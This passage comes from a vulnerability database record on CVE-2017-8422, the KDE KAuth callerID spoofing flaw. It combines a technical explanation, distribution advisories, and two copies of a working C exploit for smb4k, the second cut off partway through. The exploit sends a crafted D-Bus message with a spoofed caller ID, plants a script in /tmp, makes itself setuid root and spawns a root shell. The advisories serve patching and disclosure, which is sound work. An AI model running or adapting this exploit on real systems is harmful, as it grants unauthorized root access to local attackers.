our smb4k case containing the handcrafted evil mh_command key, amongst others key/value pairs.\r\n\r\nThere are two problems:\r\n\r\nThe KAuth frameworks performAction() method is passed the callerID by the user and the method is invokable by the user. This allows to mask as any caller, bypassing any polkit checks that may happen later in the KAuth polkit backend via calls into\r\n```\r\nPolicyKitBackend::isCallerAuthorized(const QString &action, QByteArray callerID)\r\n```\r\n\r\nThe second problem is smb4k trusting the arguments that are passed from the user and which are forwarded by the KAuth D-Bus service running as root to the mount helper D-Bus service which is also running as root but not allowed to be contacted by users. Thats a logical flaw. It was probably not intented that users invoke performAction() themself, using it as a proxy into D-Bus services and faking caller IDs en-passant. The callerID usually looks like :1.123 and is a D-Bus unique name that maps to the sender of the message. You can think of it like the source address of an IP packet. This ID should be obtained via a D-Bus function while the message is arriving, so it can actually be trusted and used as a subject for polkit authorizations when using systembus-name subjects. Allowing callers to arbitrarily choosing values for this ID is taking down the whole idea of authentication and authorization.\r\n\r\nI made an exploit for smb4k that works on openSUSE Leap 42.2 thats using the org.kde.auth interface (rather than org.kde.kf5auth) but both interfaces share the same problems. The exploit also works on the latest Fedora26 Alpha kde spin with SELinux in enforcing mode. In order to test the callerID spoofing, I \"protected\" the smb4k helper code via auth_admin polkit settings and tried mounting SMB shares via smb4k GUI. This asked for the root password, as its expected. The exploit however still works, as its spoofing the callerID to be D-Bus itself and the request is taken as legit, requiring no root password.\r\n", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "seebug", "title": "KDE kauth and kdelibs Logic Flaw Lets Local Users Obtain Root Privileges(CVE-2017-8422)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93115", "id": "SSV:93115", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2021-07-28T14:47:00", "description": "New kdelibs packages are available for Slackware 13.37, 14.0, 14.1, 14.2,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/kdelibs-4.14.32-i586-1_slack14.2.txz: Upgraded.\n This update fixes a security issue with KAuth that can lead to gaining\n root from an unprivileged account.\n For more information, see:\n http://www.openwall.com/lists/oss-security/2017/05/10/3\n https://www.kde.org/info/security/advisory-20170510-1.txt\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8422\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/kdelibs-4.5.5-i486-3_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/kdelibs-4.5.5-x86_64-3_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/kdelibs-4.8.5-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/kdelibs-4.8.5-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/kdelibs-4.10.5-i486-3_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/kdelibs-4.10.5-x86_64-3_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/kdelibs-4.14.32-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/kdelibs-4.14.32-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/kde/kdelibs-4.14.32-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/kde/kdelibs-4.14.32-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.37 package:\n2074c2dff09a4a74e60f48f08e0e9abc kdelibs-4.5.5-i486-3_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n692beba6610b1f2440650497bc3085cb kdelibs-4.5.5-x86_64-3_slack13.37.txz\n\nSlackware 14.0 package:\nc61bd3215be43dac0544b54342548837 kdelibs-4.8.5-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\na408af269fbba64dde31a91b91c72650 kdelibs-4.8.5-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\n5ddb537f570c63c792511a095bbadb86 kdelibs-4.10.5-i486-3_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n199c36c994a11bd48748ef3988ee143b kdelibs-4.10.5-x86_64-3_slack14.1.txz\n\nSlackware 14.2 package:\nef1e87085864e36b70d9aadcdd20fa7a kdelibs-4.14.32-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n5182a2121695c705376366f4be56861f kdelibs-4.14.32-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nba5ba522f02e69ee6f44fc686cce081f kde/kdelibs-4.14.32-i586-1.txz\n\nSlackware x86_64 -current package:\nda0befacb4014eafa221fbc694542d97 kde/kdelibs-4.14.32-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg kdelibs-4.14.32-i586-1_slack14.2.txz", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-16T20:14:57", "type": "slackware", "title": "[slackware-security] kdelibs", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-16T20:14:57", "id": "SSA-2017-136-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.474306", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-07-04T05:59:53", "description": "KDE kdelibs before 4.14.32 and KAuth before 5.34 allow local users to gain root privileges by spoofing a callerID and leveraging a privileged helper app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-17T14:29:00", "type": "debiancve", "title": "CVE-2017-8422", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2017-05-17T14:29:00", "id": "DEBIANCVE:CVE-2017-8422", "href": "https://security-tracker.debian.org/tracker/CVE-2017-8422", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-01-21T00:04:29", "description": "A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-10T12:25:12", "type": "redhatcve", "title": "CVE-2017-8422", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2022-01-20T22:44:16", "id": "RH:CVE-2017-8422", "href": "https://access.redhat.com/security/cve/cve-2017-8422", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T18:47:48", "description": "KDE kdelibs before 4.14.32 and KAuth before 5.34 allow local users to gain root privileges by spoofing a callerID and leveraging a privileged helper app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-17T14:29:00", "type": "cve", "title": "CVE-2017-8422", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8422"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:kde:kdelibs:4.14.31", "cpe:/a:kde:kauth:5.33"], "id": "CVE-2017-8422", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8422", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:kde:kdelibs:4.14.31:*:*:*:*:*:*:*", "cpe:2.3:a:kde:kauth:5.33:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2017-05-25T17:56:17", "description": "", "cvss3": {}, "published": "2017-05-23T00:00:00", "type": "packetstorm", "title": "KDE 4/5 KAuth Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "id": "PACKETSTORM:142638", "href": "https://packetstormsecurity.com/files/142638/KDE-4-5-KAuth-Privilege-Escalation.html", "sourceData": "`// cc -Wall smb0k.c -pedantic -std=c11 \n// \n// smb4k PoC, also demonstrating broader scope of a generic kde \n// authentication bypass vulnerability \n// \n// (C) 2017 Sebastian Krahmer \n// \n \n#define _POSIX_C_SOURCE 200112L \n#include <stdio.h> \n#include <fcntl.h> \n#include <unistd.h> \n#include <stdlib.h> \n#include <errno.h> \n#include <string.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <sys/stat.h> \n \n \nvoid die(const char *s) \n{ \nperror(s); \nexit(errno); \n} \n \n \nint main(int argc, char **argv) \n{ \nchar me[1024] = {0}; \nchar *dbus[] = { \n\"/usr/bin/dbus-send\", \n\"--system\", \n\"--print-reply\", \n\"--dest=net.sourceforge.smb4k.mounthelper\", \n\"/\", \n\"org.kde.auth.performActions\", \n\"array:byte:\" \n// The variant map, containing evil mh_command key-pair \n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\" \n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\" \n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\" \n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\" \n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\" \n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\" \n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\" \n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\" \n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\" \n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\" \n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\" \n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\" \n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\" \n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\" \n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\" \n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\" \n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\" \n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\" \n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\" \n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\" \n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\" \n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\" \n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\" \n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\" \n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,\" \n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,\" \n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\" \n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\" \n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\" \n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\" \n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\" \n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\" \n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\" \n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\" \n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\" \n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\" \n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\" \n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\" \n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\" \n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\" \n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\" \n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\" \n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\" \n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\" \n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\" \n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x34,0x00,\" \n\"0x6b,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,0x2e,0x00,0x30,0x00,\" \n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,0x73,0x00,0x68,0x00,\" \n\"0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x0a,0x00,0x6d,0x00,0x68,0x00,\" \n\"0x5f,0x00,0x69,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0xff,0xff,0xff,0xff,\" \n\"0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x63,0x00,0x6f,\" \n\"0x00,0x6d,0x00,0x6d,0x00,0x65,0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,\" \n\"0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x14,0x00,0x6d,0x00,0x68,0x00,\" \n\"0x5f,0x00,0x63,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,\" \n\"0x64,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x20,0x00,0x2f,0x00,0x74,\" \n\"0x00,0x6d,0x00,0x70,0x00,0x2f,0x00,0x78,0x00,0x6d,0x00,0x6f,0x00,0x75,\" \n\"0x00,0x6e,0x00,0x74,0x00,0x2e,0x00,0x63,0x00,0x69,0x00,0x66,0x00,0x73\", \n \n// the callerID, \":1.0\" which is dbus itself and thus always passes \n\"array:byte:58,49,46,48\", NULL}; \n \nchar *boomsh = \"/tmp/xmount.cifs\"; \nchar *const sh[] = {me, \"shell\", NULL}; \nchar *const bash[] = {\"/bin/bash\", \"--norc\", \"--noprofile\", NULL}; \nstruct stat st; \nint fd = -1; \n \nif (readlink(\"/proc/self/exe\", me, sizeof(me) - 1) < 0) \ndie(\"[-] readlink\"); \n \nif (geteuid() == 0) { \nsetuid(0); \nsetgid(0); \nif (argc == 2) { \nexecve(*bash, bash, NULL); \ndie(\"[-] execve of bash\"); \n} \nchown(me, 0, 0); \nchmod(me, 04755); \nexit(0); \n} \n \nprintf(\"[*] Creating shellscript ...\\n\"); \nunlink(boomsh); \nif ((fd = open(boomsh, O_RDWR|O_CREAT, 0755)) < 0) \ndie(\"[-] open\"); \nwrite(fd, \"#!/bin/sh\\n\", 10); \nwrite(fd, me, strlen(me)); \nwrite(fd, \"\\n\", 1); \nclose(fd); \n \nprintf(\"[*] Triggering call...\\n\"); \n \nif (fork() == 0) { \nexecve(*dbus, dbus, NULL); \nexit(1); \n} \nwait(NULL); \nsleep(5); \nprintf(\"[*] Trying to find rootshell...\\n\"); \n \nmemset(&st, 0, sizeof(st)); \nstat(me, &st); \nif ((st.st_mode & 04000) != 04000) \ndie(\"[-] Failed to chmod ourselfs.\\n\"); \n \nexecve(me, sh, NULL); \nreturn 0; \n} \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142638/kde45-escalate.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-10T04:22:50", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2017-05-23T00:00:00", "type": "zdt", "title": "KDE 4/5 - KAuth Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8422", "CVE-2017-8849"], "modified": "2017-05-23T00:00:00", "id": "1337DAY-ID-27821", "href": "https://0day.today/exploit/description/27821", "sourceData": "// cc -Wall smb0k.c -pedantic -std=c11\r\n//\r\n// smb4k PoC, also demonstrating broader scope of a generic kde\r\n// authentication bypass vulnerability\r\n//\r\n// (C) 2017 Sebastian Krahmer\r\n//\r\n \r\n#define _POSIX_C_SOURCE 200112L\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/stat.h>\r\n \r\n \r\nvoid die(const char *s)\r\n{\r\n perror(s);\r\n exit(errno);\r\n}\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\n char me[1024] = {0};\r\n char *dbus[] = {\r\n \"/usr/bin/dbus-send\",\r\n \"--system\",\r\n \"--print-reply\",\r\n \"--dest=net.sourceforge.smb4k.mounthelper\",\r\n \"/\",\r\n \"org.kde.auth.performActions\",\r\n \"array:byte:\"\r\n// The variant map, containing evil mh_command key-pair\r\n\"0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x4e,0x00,0x6e,0x00,0x65,0x00,0x74,\"\r\n\"0x00,0x2e,0x00,0x73,0x00,0x6f,0x00,0x75,0x00,0x72,0x00,0x63,0x00,0x65,\"\r\n\"0x00,0x66,0x00,0x6f,0x00,0x72,0x00,0x67,0x00,0x65,0x00,0x2e,0x00,0x73,\"\r\n\"0x00,0x6d,0x00,0x62,0x00,0x34,0x00,0x6b,0x00,0x2e,0x00,0x6d,0x00,0x6f,\"\r\n\"0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x70,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x2e,0x00,0x6d,0x00,0x6f,0x00,0x75,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x77,0x00,0x6f,0x00,0x72,0x00,0x6b,0x00,0x67,0x00,0x72,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x70,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,\"\r\n\"0x00,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x75,0x00,\"\r\n\"0x72,0x00,0x6c,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x00,0x24,0x73,0x6d,\"\r\n\"0x62,0x3a,0x2f,0x2f,0x61,0x62,0x63,0x3a,0x31,0x32,0x33,0x34,0x35,0x36,\"\r\n\"0x40,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a,0x34,0x34,0x35,\"\r\n\"0x2f,0x73,0x68,0x61,0x72,0x65,0x00,0x00,0x00,0x0c,0x00,0x6d,0x00,0x68,\"\r\n\"0x00,0x5f,0x00,0x75,0x00,0x6e,0x00,0x63,0x00,0x00,0x00,0x0a,0x00,0x00,\"\r\n\"0x00,0x00,0x22,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x32,0x00,0x37,0x00,\"\r\n\"0x2e,0x00,0x30,0x00,0x2e,0x00,0x30,0x00,0x2e,0x00,0x31,0x00,0x2f,0x00,\"\r\n\"0x73,0x00,0x68,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x00,0x00,0x14,0x00,\"\r\n\"0x6d,0x00,0x68,0x00,0x5f,0x00,0x6f,0x00,0x70,0x00,0x74,0x00,0x69,0x00,\"\r\n\"0x6f,0x00,0x6e,0x00,0x73,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x00,0x02,\"\r\n\"0x00,0x00,0x00,0x04,0x00,0x2d,0x00,0x6f,0x00,0x00,0x01,0x1c,0x00,0x75,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,\"\r\n\"0x00,0x3d,0x00,0x6a,0x00,0x6f,0x00,0x65,0x00,0x2c,0x00,0x75,0x00,0x69,\"\r\n\"0x00,0x64,0x00,0x3d,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x33,0x00,0x2c,\"\r\n\"0x00,0x67,0x00,0x69,0x00,0x64,0x00,0x3d,0x00,0x31,0x00,0x30,0x00,0x30,\"\r\n\"0x00,0x2c,0x00,0x70,0x00,0x6f,0x00,0x72,0x00,0x74,0x00,0x3d,0x00,0x34,\"\r\n\"0x00,0x34,0x00,0x35,0x00,0x2c,0x00,0x72,0x00,0x77,0x00,0x2c,0x00,0x66,\"\r\n\"0x00,0x69,0x00,0x6c,0x00,0x65,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x64,0x00,0x69,0x00,0x72,0x00,0x5f,0x00,0x6d,0x00,0x6f,0x00,0x64,\"\r\n\"0x00,0x65,0x00,0x3d,0x00,0x30,0x00,0x37,0x00,0x35,0x00,0x35,0x00,0x2c,\"\r\n\"0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x6d,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x73,0x00,0x65,0x00,0x74,0x00,0x75,0x00,0x69,0x00,0x64,0x00,0x73,\"\r\n\"0x00,0x2c,0x00,0x6e,0x00,0x6f,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x76,\"\r\n\"0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x6e,0x00,0x6f,0x00,0x2c,0x00,0x63,\"\r\n\"0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x65,0x00,0x3d,0x00,0x73,0x00,0x74,\"\r\n\"0x00,0x72,0x00,0x69,0x00,0x63,0x00,0x74,0x00,0x2c,0x00,0x6e,0x00,0x6f,\"\r\n\"0x00,0x6d,0x00,0x61,0x00,0x70,0x00,0x63,0x00,0x68,0x00,0x61,0x00,0x72,\"\r\n\"0x00,0x73,0x00,0x2c,0x00,0x73,0x00,0x65,0x00,0x63,0x00,0x3d,0x00,0x6e,\"\r\n\"0x00,0x74,0x00,0x6c,0x00,0x6d,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2c,\"\r\n\"0x00,0x76,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x3d,0x00,0x31,0x00,0x2e,\"\r\n\"0x00,0x30,0x00,0x00,0x00,0x1a,0x00,0x6d,0x00,0x68,0x00,0x5f,0x00,0x6d,\"\r\n\"0x00,0x6f,0x00,0x75,0x00,0x6e,0x00,0x74,0x00,0x70,0x00,0x6f,0x00,0x69,\"\r\n\"0x00,0x6e,0x00,0x74,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x3e,0x00,\"\r\n\"0x2f,0x00,0x68,0x00,0x6f,0x00,0x6d,0x00,0x65,0x00,0x2f,0x00,0x6a,0x00,\"\r\n\"0x6f,0x00,0x65,0x00,0x2f,0x00,0x73,0x00,